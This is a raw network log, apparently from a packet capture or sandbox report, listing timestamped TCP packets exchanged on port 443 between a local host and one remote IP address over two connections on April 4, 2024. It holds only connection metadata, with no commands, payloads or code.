Apr 4, 2024 17:49:30.369996071 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.554826021 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.554851055 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.554960012 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.555001020 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.555047035 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.660197973 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.660233021 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.660298109 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.660325050 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.660347939 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.660372972 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.752353907 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.752377987 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.752445936 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.752464056 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.752494097 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.752516031 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.826817989 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.826848984 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.826900005 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.826920033 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.826940060 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.826971054 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.881603003 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.881625891 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.881684065 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.881700993 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.881741047 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.881750107 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.932209015 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.932243109 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.932295084 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.932307005 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.932348967 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.932363987 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.984827995 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.984853983 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.984915018 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.984925032 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.984976053 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.028337955 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.028367996 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.028409958 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.028422117 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.028458118 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.028474092 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.069310904 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.069335938 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.069555998 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.069577932 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.069623947 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.103317022 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.103343010 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.103425980 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.103439093 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.103478909 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.103493929 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.132371902 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.132397890 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.132502079 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.132502079 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.132515907 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.132565975 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.157720089 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.157749891 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.157803059 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.157814026 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.157859087 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.184840918 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.184851885 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.184947014 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.184977055 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.185020924 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.206840992 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.206875086 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.206921101 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.206933022 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.206980944 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.231265068 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.231292009 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.231344938 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.231364965 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.231406927 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.231421947 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.251072884 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.251112938 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.251166105 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.251192093 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.251243114 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.251272917 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.270301104 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.270327091 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.270374060 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.270384073 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.270456076 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.270456076 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.291578054 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.291603088 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.291663885 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.291675091 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.291717052 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.309144020 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.309165001 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.309206009 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.309215069 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.309254885 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.309274912 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.328995943 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.329014063 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.329077959 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.329090118 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.329113007 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.329127073 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.345478058 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.345495939 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.345556021 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.345567942 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.345608950 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.364375114 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.364397049 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.364447117 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.364456892 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.364484072 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.364507914 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.380022049 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.380048990 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.380094051 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.380105019 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.380136013 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.380151033 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.394198895 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.394217968 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.394269943 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.394284964 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.394309044 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.394325972 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.407908916 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.407936096 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.408001900 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.408024073 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.408068895 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.421799898 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.421822071 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.421912909 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.421927929 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.421976089 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.436382055 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.436405897 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.436505079 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.436516047 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.436558008 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.448292017 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.448318958 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.448359013 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.448373079 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.448385000 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.448412895 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.461703062 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.461724997 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.461772919 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.461781979 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.461813927 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.461833000 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.473614931 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.473639965 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.473686934 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.473699093 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.473727942 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.473743916 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.484402895 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.484422922 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.484483957 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.484512091 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.484560013 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.484586954 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.496471882 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.496491909 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.496534109 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.496541977 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.496577978 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.496592999 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.506485939 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.506505966 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.506556034 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.506565094 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.506597996 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.506622076 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.517035961 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.517055988 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.517107964 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.517139912 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.517157078 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.517182112 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.526433945 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.526474953 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.526504040 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.526513100 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.526535988 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.526556015 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.527956009 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.528004885 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.528013945 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.528036118 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.528052092 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.528084993 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.529320955 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.529335976 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.529347897 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.529386044 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.626461983 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.626512051 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:31.626574039 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.627160072 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:31.627171993 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.151520967 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.151582003 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:32.182244062 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:32.182271957 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.182514906 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:32.182522058 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.978981018 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.979007959 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.979027033 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.979053974 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:32.979089022 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:32.979100943 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:32.979147911 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.094825983 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.094846964 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.094939947 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.094970942 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.095021963 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.279093027 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.279117107 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.279182911 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.279222012 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.279238939 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.279267073 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.384422064 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.384447098 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.384505033 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.384536982 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.384556055 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.384587049 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.474914074 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.474945068 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.475042105 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.475073099 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.475119114 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.549096107 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.549134016 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.549176931 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.549200058 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.549252033 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.603671074 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.603701115 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.603748083 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.603771925 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.603786945 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.604986906 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.658505917 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.658530951 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.658603907 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.658642054 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.658673048 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.658694983 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.705396891 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.705426931 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.705498934 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.705522060 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.705538988 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.705595016 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.751907110 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.751939058 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.752002954 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.752028942 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.752043009 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.752072096 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.789395094 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.789421082 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.789494038 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.789510965 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.789550066 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.821329117 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.821356058 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.821429968 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.821441889 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.821484089 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.852993011 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.853017092 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.853096008 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.853112936 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.853147030 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.853162050 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.878243923 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.878264904 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.878313065 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.878334045 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.878365040 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.878380060 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.905014992 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.905066967 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.905108929 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.905127048 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.905150890 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.905170918 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.926883936 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.926911116 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.926969051 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.926985025 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.927006960 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.927030087 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.951337099 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.951364994 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.951438904 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.951456070 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.951488972 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.951499939 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.971456051 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.971483946 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.971566916 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.971586943 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.971632957 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.990947962 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.991014957 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.991056919 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.991071939 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:33.991096020 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:33.991121054 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.015377045 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.015424967 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.015450001 CEST	49783	443	192.168.2.10	95.216.179.73
